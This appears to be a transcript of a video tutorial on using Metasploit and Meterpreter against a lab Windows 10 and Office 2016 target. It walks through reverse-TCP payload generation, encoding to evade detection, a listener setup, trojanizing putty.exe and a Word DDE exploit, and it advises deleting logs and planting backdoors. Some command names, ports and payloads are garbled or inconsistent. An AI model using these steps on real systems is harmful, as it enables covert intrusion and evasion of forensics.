Hello world. Today we're going to talk about Metasploit and Meterpreter, and end up with an example getting access to a victim's machine and discussing ways to avoid detection. First of all, what is Metasploit? The Metasploit framework is a partially free, popular computer security project that provides information about security vulnerabilities. It is used by penetration testers to search known weaknesses, bugs, in computer systems. These known weaknesses are called exploits and are available in a standardized shape. Once chosen an exploit, it's possible to choose a payload. A payload is code that will be executed on the target system upon successful entry to gain access. A popular payload is Meterpreter. Meterpreter offers a more extended shell, Unix-like, comparing the ordinary Windows command shell to communicate with, and control, the victim's machine. And last but not least, Metasploit offers a database to properly organize the workflow and encoding techniques to avoid intruders' detection. MS Console is the console version of Metasploit, preferred by most people as it's the most puritanical way of using Metasploit. But there is also a GUI version called Armitage. I want to mention it's possible to make your own exploit and payload and use scanning features, but will not focus on that during this video. Just be aware the possibilities are huge. What is the Metasploit philosophy? The purpose of Metasploit is to check if there are any weaknesses in the current security configuration. Practically the goal is to gain access to a machine. But maybe more important to stay as undetected as possible. This is because we don't want to be detected by IPS, intrusion prevention system, or leave any traces for forensic investigation. To obtain this, we need to stay as much as possible out of the hard drive of the victim. The hard drive contains logs, the time when we edited or accessed a file and so on. To accomplish this, there are three kinds of payloads. First, there are singles. Those are standalone example given when opening an exe file. Second are stagers. They run with a network connection and are small and reliable. Tier 3 we have stages. Those are payload components that are downloaded by stagers such as Meterpreter. To avoid leaving traces in the hard drive, it runs directly in the memory of the victim's machine. In that way there are no or minimal traces left behind on the hard drive. We can make research more difficult to change accessing times and delete logs. But don't leave a great mess behind, because you'll clearly expose someone was into the system. What can we do as we got access, and have a Meterpreter session? Everything with the same privileges as the current user and program rights. Frequently this is limited and can severely limit actions you can perform on the remote system. Examples are dumping passwords, manipulating the registry, installing backdoors, and so on. We want to achieve system privileges to have full control. Meterpreter has automatic ways to do so. Using the getsystem command. If the automatic techniques doesn't work, we need to manually getting system to get full access. Generate an executable for your payload and use SC to create a service. Or use AT to run programs and commands at scheduled times. Use this options to run your Meterpreter session as system. Now time for a tutorial. I will show you how to use Metasploit and Meterpreter to get access to a victim's machine. This tutorial uses a recently MS Office vulnerability. Be aware. Using this technique is illegal and for educational purpose only. I'm not responsible for any damage at all. This tutorial uses a Windows 10 machine with Office 2016 running and the previous version of Kali Linux, 2017.1, because with 2017.2 I had VMware full screen struggles. Using Kali Linux is easy because Metasploit is already pre-installed with all dependencies ready. This example is executed a lab environment, only for testing purposes. After Metasploit started, we can simply generate our payload by typing in misvenmp, which indicates the payload, Windows/Meterpreter/reverse_TCP. The localhost parameter sets the IP address of the attacker's machine, in this case 192.168.1.10. The local port sets the port where the attacker's machine will be listening on, in this case port 1487. The encryption parameter shows as the encryption method, in this case x86/Shikata_GA_9. The interval parameter is set so the encoding will happen 5 times. The bad characters parameter will try to encode these bad characters. They will not be in the final code. A bad character is simply a list of unwanted characters that can break the shell codes. There is no universal set of bad characters, as we would probably be beginning to understand, but depending on the application and the developer logic there is a different set of bad characters for every program that we would encounter. Therefore, we will have to find out the bad characters in every application before writing the shell code. Some of the very common bad characters are in hexadecimal format. 00 for null. 0A for line feed. 0D for carriage return. FF for form feed. Now press enter and see the result. This code can be injected into programs so a reverse TCP connection will be established from the victim back to the attacker's machine. We can also change the programming language by adding the F parameter. For example, we can use Java as programming language. This code can later be injected into a Java program. The generated payload can be injected in files, and after the victim opens the file, a Meterpreter session will open. We need to listen for incoming connections. This is called a handler and can be achieved using this commands. Use exploit/multi/handler. Now we can choose the payload, so we type set payload windows/shell_reverse_TCP, the same payload as before. Now we can configure the local host by typing set lhost 192.168.1.10, the attacker's IP address. Now we can configure the local port by typing set port 1458, the attacker's port to listen to. Now we only need to type one command, exploit, to start listening for incoming connections from the victim. When a victim opens the infected file, a Meterpreter session will show up. You can also automatically inject code into files by using more parameters. For example, inject it into putty.exe and output it as putty_infected.exe. The K parameter will ensure the putty application will still work in another thread. This approach is more and more known by IDS. Manual injection is better to be not detected. Download an exploit from GitHub by using wget. Next, move the script to the Metasploit location. Reload all modules so the new one is also loaded. This exploit uses the DDE function to deliver the HTA payload. Next, we set the server host to the attacker's IP address. Now the finishing touch, configuring the local host IP address and local port number. Last but not least, exploit. Now copy the DDE. Open MS Word. Add a new formula and type a random character. Press OK. Right-click and select Other Field Display. Delete everything between brackets and paste the DDE code. Save the file. Once the file is opened, after a few strange errors, a new Meterpreter session is open. We're in. Thank you for your attention.